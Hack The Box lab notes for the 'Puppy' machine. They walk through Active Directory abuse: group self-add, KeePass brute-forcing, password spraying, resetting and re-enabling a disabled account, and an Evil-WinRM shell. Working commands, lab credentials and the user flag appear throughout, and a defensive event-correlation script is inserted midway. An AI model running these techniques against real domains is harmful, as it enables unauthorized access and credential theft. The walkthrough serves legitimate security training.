PUPPY-HTB Notes

Here are my notes on PUPPY from Hack The Box.

PUPPY: 10.129.59.251

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

PORT     STATE SERVICE       VERSION                                                                                                                
53/tcp   open  domain        Simple DNS Plus


sudo bloodhound-python -u 'levi.james' -p 'KingofAkron2025!' -ns 10.129.59.251 -d puppy.htb -c all 


levi.james -> Member of HR Group -> GenericWrite -> Developers@Puppy.HTB GROUP 

net rpc group addmem "Developers" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.129.59.251

net rpc group members "Developers" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.129.59.251


┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/BLOOD]
└─# net rpc group addmem "Developers" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.129.59.251


┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/BLOOD]
└─# net rpc group members "Developers" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.129.59.251

PUPPY\levi.james
PUPPY\ant.edwards
PUPPY\adam.silver
PUPPY\jamie.williams

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/BLOOD]
└─# crackmapexec smb 10.129.59.251 -u levi.james -p 'KingofAkron2025!' --shares
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.59.251   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.59.251   445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB         10.129.59.251   445    DC               [+] Enumerated shares
SMB         10.129.59.251   445    DC               Share           Permissions     Remark
SMB         10.129.59.251   445    DC               -----           -----------     ------
SMB         10.129.59.251   445    DC               ADMIN$                          Remote Admin
SMB         10.129.59.251   445    DC               C$                              Default share
SMB         10.129.59.251   445    DC               DEV             READ            DEV-SHARE for PUPPY-DEVS
SMB         10.129.59.251   445    DC               IPC$            READ            Remote IPC
SMB         10.129.59.251   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.59.251   445    DC               SYSVOL          READ            Logon server share


GenericAll to the Disabled User Account:

ant.edwards -> Member of SENIOR DEVS Group -> GenericAll -> ADAM.SILVER User -> Member of Remote Management Users Group = USER-SHELL !

net rpc password "adam.silver" 'Password123!' -U "puppy.htb"/"ant.edwards"%'Antman2025!' -S 10.129.59.251

faketime -f $(ntpdate -q dc.puppy.htb | awk '{print $4}') bash

crackmapexec smb 10.129.59.251 -u adam.silver -p Password123
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.59.251   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.59.251   445    DC               [-] PUPPY.HTB\adam.silver:Password123 STATUS_ACCOUNT_DISABLED

#Account is disabled, though!

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# bloodyAD -u ant.edwards -d puppy.htb -p Antman2025! --host 10.129.113.196 remove uac adam.silver -f ACCOUNTDISABLE

[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# crackmapexec smb 10.129.113.196 -u adam.silver -p Password123!
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.113.196  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.113.196  445    DC               [+] PUPPY.HTB\adam.silver:Password123!

Account-Enabled !

https://notes.incendium.rocks/pentesting-notes/windows-pentesting/tools/bloodyad

evil-winrm -i 10.129.113.196 -u adam.silver -p Password123!

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents> whoami
puppy\adam.silver
*Evil-WinRM* PS C:\Users\adam.silver\Documents> hostname
DC

USER-SHELL ! 

*Evil-WinRM* PS C:\Users\adam.silver\Desktop> whoami
puppy\adam.silver
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> hostname
DC
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> dir


    Directory: C:\Users\adam.silver\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/28/2025  12:31 PM           2312 Microsoft Edge.lnk
-ar---         5/27/2025   4:31 PM             34 user.txt


*Evil-WinRM* PS C:\Users\adam.silver\Desktop> type user.txt
[REDIRECTED]

USER.TXT: [REDIRECTED]
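
Seen from the blue-team side, the chain above (self-add to Developers, password reset on adam.silver, ACCOUNTDISABLE removed, then a logon) maps to Windows Security events 4728/4732/4756, 4724, 4722 and 4624. The following is an added example, not part of the original notes: a correlation sketch over a simplified, constructed event format; the field names, the 30-minute window and the approved_operators allowlist are assumptions.

```python
from datetime import datetime, timedelta

GROUP_ADD_IDS = {4728, 4732, 4756}   # member added to a global / local / universal group
PASSWORD_RESET, ACCOUNT_ENABLED, LOGON = 4724, 4722, 4624

# Constructed sample: already-parsed Security log records, reduced to the
# fields the rules need. Values are made up to mirror the sequence in the notes.
SAMPLE_EVENTS = [
    {"id": 4728, "time": "2025-05-23T00:31:10", "subject": "levi.james",
     "member": "levi.james", "group": "DEVELOPERS"},
    {"id": 4724, "time": "2025-05-23T00:52:02", "subject": "ant.edwards",
     "target": "adam.silver"},
    {"id": 4722, "time": "2025-05-23T00:55:40", "subject": "ant.edwards",
     "target": "adam.silver"},
    {"id": 4624, "time": "2025-05-23T00:57:15", "target": "adam.silver"},
    # Benign: a help desk reset with no re-enable of the account.
    {"id": 4724, "time": "2025-05-23T09:00:00", "subject": "helpdesk.svc",
     "target": "jamie.williams"},
]


def _same(a, b):
    """Account names compare case-insensitively in AD."""
    return a.lower() == b.lower()


def detect(events, approved_operators=frozenset(), window=timedelta(minutes=30)):
    """Return alerts as (rule, actor, object) tuples, in time order per rule."""
    approved = {name.lower() for name in approved_operators}
    evs = sorted(({**e, "ts": datetime.fromisoformat(e["time"])} for e in events),
                 key=lambda e: e["ts"])
    alerts = []

    # Rule 1: an account adds itself to a group (GenericWrite on the group).
    for e in evs:
        if e["id"] in GROUP_ADD_IDS and _same(e["subject"], e["member"]):
            alerts.append(("self_group_add", e["subject"], e["group"]))

    # Rule 2: the same non-approved actor resets a password and enables the
    # same account within the window (GenericAll on a disabled user).
    resets = [e for e in evs if e["id"] == PASSWORD_RESET]
    logons = [e for e in evs if e["id"] == LOGON]
    for en in (e for e in evs if e["id"] == ACCOUNT_ENABLED):
        actor, target = en["subject"], en["target"]
        if actor.lower() in approved:
            continue
        paired = any(_same(r["subject"], actor) and _same(r["target"], target)
                     and abs(r["ts"] - en["ts"]) <= window for r in resets)
        if not paired:
            continue
        # Escalate when the re-enabled account logs on shortly afterwards.
        used = any(_same(l["target"], target)
                   and timedelta(0) <= l["ts"] - en["ts"] <= window for l in logons)
        rule = "reset_and_enable_then_logon" if used else "reset_and_enable"
        alerts.append((rule, actor, target))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Events 4728/4732/4756 require the "Audit Security Group Management" subcategory and 4722/4724 require "Audit User Account Management" to be enabled on the domain controllers.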



Didn't work, don't bother:


targetedKerberoast.py -v -d 'puppy.htb' -u 'ant.edwards' -p 'Antman2025!'

python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'puppy.htb' -u 'ant.edwards' -p 'Antman2025!'



faketime -f $(ntpdate -q dc.puppy.htb | awk '{print $4}') bash


crackmapexec smb 10.129.59.251 -u adam.silver -p Password123
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.59.251   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.59.251   445    DC               [-] PUPPY.HTB\adam.silver:Password123 STATUS_ACCOUNT_DISABLED

#Account is disabled, though!

Kerberos


pywhisker.py -d "puppy.htb" -u "ant.edwards" -p 'Antman2025!' --target "adam.silver" --action "list"

python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "puppy.htb" -u "ant.edwards" -p 'Antman2025!' --target "adam.silver" --action "list"

python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "puppy.htb" -u "ant.edwards" -p 'Antman2025!' --target "adam.silver" --action "add"

python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/PKINITtools/gettgtpkinit.py -cert-pfx "vixPsCQ0.pfx" -pfx-pass "RcjN0rbpB9J9KkCdTSu9" "puppy.htb"/"adam.silver" adam-silver_shadow.ccache

export KRB5CCNAME=adam-silver_shadow.ccache

python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/PKINITtools/getnthash.py puppy.htb/adam.silver -key ddfea8610c5e634577a7fbe5352990e1327649bbad61335f180b7df9d4e6c462


certipy cert -export -pfx "FYYdEZPX.pfx" -password "bW102Bl162SUxGuDns6L" -out unprotected_pfx.pfx

certipy auth -pfx unprotected_pfx.pfx -username adam.silver -domain puppy.htb


python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/PKINITtools/gettgtpkinit.py -cert-pfx "FYYdEZPX.pfx" -pfx-pass "bW102Bl162SUxGuDns6L" "puppy.htb"/"adam.silver" output_TGT.ccache

certipy cert -export -pfx "FYYdEZPX.pfx" -password "bW102Bl162SUxGuDns6L" -out unprotected_pfx.pfx

certipy auth -pfx unprotected_pfx.pfx -username "$USER" -domain "$DOMAIN"


certipy shadow auto -u "ant.edwards"@"puppy.htb" -p 'Antman2025!' -account "adam.silver"


┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# crackmapexec smb 10.129.228.110 -u adam.silver -p 'Password123!'
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.228.110  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.228.110  445    DC               [-] PUPPY.HTB\adam.silver:Password123! STATUS_LOGON_FAILURE

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# net rpc password "adam.silver" 'Password123!' -U "puppy.htb"/"ant.edwards"%'Antman2025!' -S 10.129.228.110

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# crackmapexec smb 10.129.228.110 -u adam.silver -p 'Password123!'
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.228.110  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.228.110  445    DC               [-] PUPPY.HTB\adam.silver:Password123! STATUS_ACCOUNT_DISABLED


#Overpass the hash maybe ? 

getTGT.py puppy.htb/adam.silver:Password123! -dc-ip 10.129.228.110

export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/C.Neri.ccache

evil-winrm -i dc01.vintage.htb -r vintage.htb

# Adam D. Silver, Users, PUPPY.HTB
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Adam D. Silver
sn: Silver
givenName: Adam
initials: D
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
instanceType: 4
whenCreated: 20250219121623.0Z
whenChanged: 20250523010429.0Z
displayName: Adam D. Silver
uSNCreated: 12814
memberOf: CN=DEVELOPERS,DC=PUPPY,DC=HTB
memberOf: CN=Remote Management Users,CN=Builtin,DC=PUPPY,DC=HTB


#This is not about Kerberoasting or complicated shadow credentials attacks and stuff like that.

#NOPE: Kerberos session errors, so no Kerberos or shadow credentials attacks here.

sudo bloodhound-python -u 'ant.edwards' -p 'Antman2025!' -ns 10.129.128.95 -d puppy.htb -c all 

rpcclient -U "puppy.htb\\ant.edwards" dc.puppy.htb



88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-23 00:30:49Z)


┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# GetUserSPNs.py -request -dc-ip 10.129.59.251 puppy.htb/levi.james:KingofAkron2025!
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

No entries found!

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# GetNPUsers.py -dc-ip 10.129.59.251 puppy.htb/ -usersfile users.txt
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User levi.james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ant.edwards doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User jamie.williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steph.cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steph.cooper_adm doesn't have UF_DONT_REQUIRE_PREAUTH set

#NOPE, no AS-REP roasting and no Kerberoasting!


111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)

ldapsearch -H ldap://10.129.59.251 -x -W -D "levi.james@puppy.htb" -b "dc=puppy,dc=htb"

KingofAkron2025!

ldapsearch -H ldap://10.129.59.251 -x -W -D "levi.james@puppy.htb" -b "dc=puppy,dc=htb"  '(objectClass=person)' > ldap-people

#NOPE: no passwords and no interesting descriptions in the LDAP output.





445/tcp  open  microsoft-ds?

crackmapexec smb 10.129.59.251 -u levi.james -p KingofAkron2025! --shares
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.59.251   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.59.251   445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB         10.129.59.251   445    DC               [+] Enumerated shares
SMB         10.129.59.251   445    DC               Share           Permissions     Remark
SMB         10.129.59.251   445    DC               -----           -----------     ------
SMB         10.129.59.251   445    DC               ADMIN$                          Remote Admin
SMB         10.129.59.251   445    DC               C$                              Default share
SMB         10.129.59.251   445    DC               DEV                             DEV-SHARE for PUPPY-DEVS
SMB         10.129.59.251   445    DC               IPC$            READ            Remote IPC
SMB         10.129.59.251   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.59.251   445    DC               SYSVOL          READ            Logon server share

sudo lookupsid.py levi.james@10.129.59.251 | tee usernames

grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt


┌──(root㉿kali)-[/home/…/BOXES/PUPPY/10.129.59.251/SYSVOL]
└─# smbclient \\\\10.129.59.251\\SYSVOL -U "levi.james"
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Mar 21 01:33:44 2025
  ..                                  D        0  Wed Feb 19 06:44:57 2025
  lvRxjnmZBA                          D        0  Fri Mar 21 01:33:44 2025
  PUPPY.HTB                          Dr        0  Wed Feb 19 06:44:57 2025
  UltFsQYRGg.txt                      A        0  Fri Mar 21 01:33:44 2025

                5080575 blocks of size 4096. 1546094 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *

comment.cmtx: 

<?xml version='1.0' encoding='utf-8'?>
<policyComments xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/CommentDefinitions">
  <policyNamespaces>
    <using prefix="ns0" namespace="Microsoft.Policies.WindowsDefender"></using>
  </policyNamespaces>
  <comments>
    <admTemplate></admTemplate>
  </comments>
  <resources minRequiredRevision="1.0">
    <stringTable></stringTable>
  </resources>
</policyComments>   

#NOPE and NOTHING INTERESTING in SYSVOL share !


#After adding levi.james to Developers (the path BloodHound showed), the DEV share is readable:

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/BLOOD]
└─# crackmapexec smb 10.129.59.251 -u levi.james -p 'KingofAkron2025!' --shares
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.59.251   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.59.251   445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB         10.129.59.251   445    DC               [+] Enumerated shares
SMB         10.129.59.251   445    DC               Share           Permissions     Remark
SMB         10.129.59.251   445    DC               -----           -----------     ------
SMB         10.129.59.251   445    DC               ADMIN$                          Remote Admin
SMB         10.129.59.251   445    DC               C$                              Default share
SMB         10.129.59.251   445    DC               DEV             READ            DEV-SHARE for PUPPY-DEVS
SMB         10.129.59.251   445    DC               IPC$            READ            Remote IPC
SMB         10.129.59.251   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.59.251   445    DC               SYSVOL          READ            Logon server share

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# smbclient \\\\10.129.59.251\\DEV -U "levi.james"
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sun Mar 23 03:07:57 2025
  ..                                  D        0  Sat Mar  8 11:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 03:09:12 2025
  Projects                            D        0  Sat Mar  8 11:53:36 2025
  recovery.kdbx                       A     2677  Tue Mar 11 22:25:46 2025

                5080575 blocks of size 4096. 1544991 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
getting file \KeePassXC-2.7.9-Win64.msi of size 34394112 as KeePassXC-2.7.9-Win64.msi (1215.7 KiloBytes/sec) (average 1215.7 KiloBytes/sec)
getting file \recovery.kdbx of size 2677 as recovery.kdbx (20.0 KiloBytes/sec) (average 1210.1 KiloBytes/sec)



KDBX4 - KeePass 4 Password Cracking:

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# ls
KeePassXC-2.7.9-Win64.msi  Projects  recovery.kdbx

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# kpcli --kdb recovery.kdbx
KDBX4 files are not directly supported, but they can be imported.
 - The KDBX format is supported through version 3.1.
 - To import a KDBX v4 file, use the import command.
 - For details, see: help import
 
#Use keepassxc-cli instead. 
 
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# ls
KeePassXC-2.7.9-Win64.msi  Projects  recovery.hashes  recovery.kdbx

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# keepassxc-cli ls recovery.kdbx
Enter password to unlock recovery.kdbx:


https://github.com/r3nt0n/keepass4brute



┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# cd keepass4brute

┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# ls
keepass4brute.sh  LICENSE  README.md  recovery.kdbx

┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# ./keepass4brute.sh
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

Usage ./keepass4brute.sh <kdbx-file> <wordlist>

┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# ./keepass4brute.sh  recovery.kdbx /usr/share/seclists/Passwords/darkweb2017-top10000.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 126/9999 - Attempts per minute: 31 - Estimated time remaining: 5 hours, 18 minutes
[+] Current attempt: liverpool

[*] Password found: liverpool

#PASSWORD FOUND ! liverpool


┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli ls recovery.kdbx
Enter password to unlock recovery.kdbx:
JAMIE WILLIAMSON
ADAM SILVER
ANTONY C. EDWARDS
STEVE TUCKER
SAMUEL BLAKE


-WORKS ! 

┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli show -s recovery.kdbx "JAMIE WILLIAMSON"
Enter password to unlock recovery.kdbx:
Title: JAMIE WILLIAMSON
UserName:
Password: JamieLove2025!
URL: puppy.htb
Notes:
Uuid: {5f112cf4-85ed-4d4d-bf0e-5e35da983367}
Tags:

┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli show -s recovery.kdbx "ADAM SILVER"
Enter password to unlock recovery.kdbx:
Title: ADAM SILVER
UserName:
Password: HJKL2025!
URL: puppy.htb
Notes:
Uuid: {387b31a3-4a42-4352-ad9a-a42a70fa19f5}
Tags:

┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli show -s recovery.kdbx "ANTONY C. EDWARDS"
Enter password to unlock recovery.kdbx:
Title: ANTONY C. EDWARDS
UserName:
Password: Antman2025!
URL: puppy.htb
Notes:
Uuid: {bfd9590f-b0c6-41f8-b2f5-7e6c5defa5e2}
Tags:


┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli show -s recovery.kdbx "STEVE TUCKER"
Enter password to unlock recovery.kdbx:
Title: STEVE TUCKER
UserName:
Password: Steve2025!
URL: puppy.htb
Notes:
Uuid: {d51a238d-4fe4-4ede-bb83-e6bb6e48a0a1}
Tags:


┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli show -s recovery.kdbx "SAMUEL BLAKE"
Enter password to unlock recovery.kdbx:
Title: SAMUEL BLAKE
UserName:
Password: ILY2025!
URL: puppy.htb
Notes:
Uuid: {d17c1358-f48b-4865-8ab6-15484dccb69b}
Tags:




pass.txt:

KingofAkron2025!
JamieLove2025!
HJKL2025!
Antman2025!
Steve2025!
ILY2025!


┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# cat users.txt
Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# cat pass.txt
KingofAkron2025!
JamieLove2025!
HJKL2025!
Antman2025!
Steve2025!
ILY2025!   

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# crackmapexec smb 10.129.59.251 -u users.txt -p pass.txt --continue-on-success | grep "[+]"
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB                      10.129.59.251   445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB                      10.129.59.251   445    DC               [+] PUPPY.HTB\ant.edwards:Antman2025!

ant.edwards:Antman2025! 


┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# crackmapexec smb 10.129.228.110 -u ant.edwards -p Antman2025! --shares
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.228.110  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.228.110  445    DC               [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB         10.129.228.110  445    DC               [+] Enumerated shares
SMB         10.129.228.110  445    DC               Share           Permissions     Remark
SMB         10.129.228.110  445    DC               -----           -----------     ------
SMB         10.129.228.110  445    DC               ADMIN$                          Remote Admin
SMB         10.129.228.110  445    DC               C$                              Default share
SMB         10.129.228.110  445    DC               DEV             READ,WRITE      DEV-SHARE for PUPPY-DEVS
SMB         10.129.228.110  445    DC               IPC$            READ            Remote IPC
SMB         10.129.228.110  445    DC               NETLOGON        READ            Logon server share
SMB         10.129.228.110  445    DC               SYSVOL          READ            Logon server share








464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  status        1 (RPC #100024)

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# showmount -e 10.129.59.251
Export list for 10.129.59.251:

#NOPE, EMPTY and DON'T BOTHER ! 


3260/tcp open  iscsi?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp  open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found


evil-winrm -i 10.129.113.196 -u adam.silver -p Password123!

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents> whoami
puppy\adam.silver
*Evil-WinRM* PS C:\Users\adam.silver\Documents> hostname
DC

USER-SHELL ! 

*Evil-WinRM* PS C:\Users\adam.silver\Desktop> whoami
puppy\adam.silver
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> hostname
DC
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> dir


    Directory: C:\Users\adam.silver\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/28/2025  12:31 PM           2312 Microsoft Edge.lnk
-ar---         5/27/2025   4:31 PM             34 user.txt


*Evil-WinRM* PS C:\Users\adam.silver\Desktop> type user.txt
bfbeb0b07aef036d053ef5d6178e86a5

USER.TXT: bfbeb0b07aef036d053ef5d6178e86a5


adam.silver -> steph.cooper: 

*Evil-WinRM* PS C:\> cd Backups
*Evil-WinRM* PS C:\Backups> dir


    Directory: C:\Backups


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip


*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip

Info: Downloading C:\Backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip

Info: Download successful!

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# mv site-backup-2024-12-30.zip site-backup

